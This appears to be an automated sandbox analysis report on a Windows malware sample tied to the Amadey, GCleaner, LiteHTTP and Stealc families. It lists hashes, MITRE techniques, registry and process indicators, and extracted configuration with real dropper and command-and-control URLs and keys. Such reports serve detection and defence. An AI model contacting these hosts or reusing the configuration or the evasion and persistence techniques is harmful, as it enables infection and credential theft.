amadey | 0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3

Analysis

max time kernel
150s
max time network
148s
platform
windows7_x64
resource
win7-20250207-en
resource tags

arch:x64arch:x86image:win7-20250207-enlocale:en-usos:windows7-x64system
submitted
05/03/2025, 17:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe
Size

1.8MB
MD5

a8b6c4d692ab95e6a154ea2a6e5ba085
SHA1

64d765440ca4cb5f3e559dfbb4364aabc9608765
SHA256

0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3
SHA512

03c18afb274d13fbcbe42b8bce86e3ab4850a72d318e970e409fc3c932faca58dd3b19db43b80cd4c88c70ddf1ba6a7ae7a385542823e13ffee2e613c3a1229c
SSDEEP

49152:vKrhNjJXwUum66K/Q5sArZ1jiH08O1/n00pSG3UCBIjE6v5:CrhN1wUum66lsoOH08+n0KSnCB5g

Score

10^/10

amadey gcleaner litehttp stealc 092155 trump bot defense_evasion discovery dropper execution loader persistence spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

http://176.113.115.6

Attributes

install_dir
bb556cff4a
install_file
rapes.exe
strings_key
a131b127e996a898cd19ffb2d92e481b
url_paths
/Ni9kiput/index.php

rc4.plain

Extracted

Family

litehttp

Version

v1.0.9

http://185.208.156.162/page.php

Attributes

key
v1d6kd29g85cm8jp4pv8tvflvg303gbl

Extracted

Family

stealc

Botnet

trump

http://45.93.20.28

Attributes

url_path
/85a1cacf11314eb8.php

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
Gcleaner family
gcleaner
LiteHTTP
LiteHTTP is an open-source bot written in C#.
stealer bot litehttp
Litehttp family
litehttp
Stealc
Stealc is an infostealer written in C++.
stealer stealc
Stealc family
stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 10 IoCs

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	bb58ec9b46.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	bc0ffaf002.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	1682315e29.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	c38bb66176.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	08b7add333.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	cc9c0966b2.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	rapes.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	TempKWU4HQYTP3YKRSPXDCTBVXMENMNRNFI0.EXE
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	483d2fa8a0d53818306efeb32d3.exe

Blocklisted process makes network request 2 IoCs

flow	pid	Process
14	1616	powershell.exe
15	1396	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2196	powershell.exe
2560	powershell.exe
2000	powershell.exe
1616	powershell.exe
1396	powershell.exe
2780	powershell.exe

Download via BitsAdmin 1 TTPs 3 IoCs

dropper

BITS Jobs

T1197

pid	Process
444	bitsadmin.exe
1316	bitsadmin.exe
1908	bitsadmin.exe

Downloads MZ/PE file 15 IoCs

flow	pid	Process
50	2956	rapes.exe
50	2956	rapes.exe
14	1616	powershell.exe
15	1396	powershell.exe
22	1364	ce4pMzk.exe
5	2956	rapes.exe
13	2956	rapes.exe
13	2956	rapes.exe
13	2956	rapes.exe
13	2956	rapes.exe
13	2956	rapes.exe
13	2956	rapes.exe
13	2956	rapes.exe
19	2092	BitLockerToGo.exe
35	1608	BitLockerToGo.exe

Checks BIOS information in registry 2 TTPs 20 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	08b7add333.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	bc0ffaf002.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	1682315e29.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	483d2fa8a0d53818306efeb32d3.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	rapes.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	TempKWU4HQYTP3YKRSPXDCTBVXMENMNRNFI0.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	bb58ec9b46.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	08b7add333.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	bc0ffaf002.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	1682315e29.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	c38bb66176.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	c38bb66176.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	TempKWU4HQYTP3YKRSPXDCTBVXMENMNRNFI0.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	bb58ec9b46.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	cc9c0966b2.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	cc9c0966b2.exe

Executes dropped EXE 19 IoCs

pid	Process
2956	rapes.exe
2612	Y87Oyyz.exe
932	Y87Oyyz.exe
2292	SplashWin.exe
1068	SplashWin.exe
2448	b59d803e02.exe
1364	ce4pMzk.exe
1548	TempKWU4HQYTP3YKRSPXDCTBVXMENMNRNFI0.EXE
2140	483d2fa8a0d53818306efeb32d3.exe
2820	bb58ec9b46.exe
1892	272923809e.exe
2036	272923809e.exe
1876	08b7add333.exe
1880	HeCsH61.exe
1332	bc0ffaf002.exe
2468	1682315e29.exe
2388	c38bb66176.exe
1456	cc9c0966b2.exe
2032	0764c3a87d.exe

Identifies Wine through registry keys 2 TTPs 10 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

defense_evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	rapes.exe
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	08b7add333.exe
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	bc0ffaf002.exe
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	1682315e29.exe
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	c38bb66176.exe
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	TempKWU4HQYTP3YKRSPXDCTBVXMENMNRNFI0.EXE
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	bb58ec9b46.exe
Key opened	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Wine	cc9c0966b2.exe

Loads dropped DLL 52 IoCs

pid	Process
2988	0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe
2956	rapes.exe
2612	Y87Oyyz.exe
932	Y87Oyyz.exe
932	Y87Oyyz.exe
2292	SplashWin.exe
2292	SplashWin.exe
2292	SplashWin.exe
2292	SplashWin.exe
1068	SplashWin.exe
1068	SplashWin.exe
1068	SplashWin.exe
1220	cmd.exe
1880	Syncsign_v1.exe
2956	rapes.exe
2956	rapes.exe
1616	powershell.exe
1616	powershell.exe
1396	powershell.exe
1396	powershell.exe
2956	rapes.exe
2956	rapes.exe
2956	rapes.exe
1892	272923809e.exe
1340	WerFault.exe
1340	WerFault.exe
1340	WerFault.exe
1340	WerFault.exe
1340	WerFault.exe
2000	WerFault.exe
2000	WerFault.exe
2000	WerFault.exe
2000	WerFault.exe
2000	WerFault.exe
2956	rapes.exe
2956	rapes.exe
1364	ce4pMzk.exe
1364	ce4pMzk.exe
2956	rapes.exe
2956	rapes.exe
2956	rapes.exe
2956	rapes.exe
2092	BitLockerToGo.exe
2956	rapes.exe
2956	rapes.exe
2368	WerFault.exe
2368	WerFault.exe
2368	WerFault.exe
2956	rapes.exe
2956	rapes.exe
1608	BitLockerToGo.exe
2956	rapes.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\b59d803e02.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104610101\\b59d803e02.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10104620121\\am_no.cmd"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\ElWUewDf\\Anubis.exe\""	ce4pMzk.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\c38bb66176.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105140101\\c38bb66176.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\cc9c0966b2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105150101\\cc9c0966b2.exe"	rapes.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Windows\CurrentVersion\Run\0764c3a87d.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10105160101\\0764c3a87d.exe"	rapes.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x0009000000016114-178.dat	autoit_exe
behavioral1/files/0x000500000001a4c9-563.dat	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs

pid	Process
2988	0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe
2956	rapes.exe
1548	TempKWU4HQYTP3YKRSPXDCTBVXMENMNRNFI0.EXE
2140	483d2fa8a0d53818306efeb32d3.exe
2820	bb58ec9b46.exe
1876	08b7add333.exe
1332	bc0ffaf002.exe
2468	1682315e29.exe
2388	c38bb66176.exe
1456	cc9c0966b2.exe

Suspicious use of SetThreadContext 4 IoCs

description	pid	Process	procid_target
PID 1068 set thread context of 1220	1068	SplashWin.exe	37
PID 1892 set thread context of 2036	1892	272923809e.exe	75
PID 2820 set thread context of 2092	2820	bb58ec9b46.exe	78
PID 1876 set thread context of 1608	1876	08b7add333.exe	83

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\Tasks\rapes.job	0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 3 IoCs

pid	pid_target	Process	procid_target
1340	1892	WerFault.exe	74
2000	2036	WerFault.exe	75
2368	2388	WerFault.exe	87

System Location Discovery: System Language Discovery 1 TTPs 42 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Y87Oyyz.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cc9c0966b2.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage	0764c3a87d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	fltMC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bb58ec9b46.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	272923809e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rapes.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SplashWin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SplashWin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	08b7add333.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	c38bb66176.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bitsadmin.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	b59d803e02.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	272923809e.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	BitLockerToGo.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bc0ffaf002.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1682315e29.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	0764c3a87d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language	0764c3a87d.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Y87Oyyz.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
2860	timeout.exe

Kills process with taskkill 1 IoCs

defense_evasion

pid	Process
2088	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe
Key created	\REGISTRY\USER\S-1-5-21-677481364-2238709445-1347953534-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Modifies system certificate store 2 TTPs 5 IoCs

defense_evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	bc0ffaf002.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	bc0ffaf002.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	bc0ffaf002.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	1682315e29.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	1682315e29.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2720	schtasks.exe
996	schtasks.exe

Suspicious behavior: EnumeratesProcesses 38 IoCs

pid	Process
2988	0cacf34f65fd5bc90c5abd9387d18deffcca330ff0675241d6cc719f2ee000b3.exe
2956	rapes.exe
2292	SplashWin.exe
1068	SplashWin.exe
1068	SplashWin.exe
1220	cmd.exe
1220	cmd.exe
1616	powershell.exe
2196	powershell.exe
2560	powershell.exe
2000	powershell.exe
1396	powershell.exe
1364	ce4pMzk.exe
1364	ce4pMzk.exe
1364	ce4pMzk.exe
1364	ce4pMzk.exe
1616	powershell.exe
1616	powershell.exe
1548	TempKWU4HQYTP3YKRSPXDCTBVXMENMNRNFI0.EXE
1396	powershell.exe
1396	powershell.exe
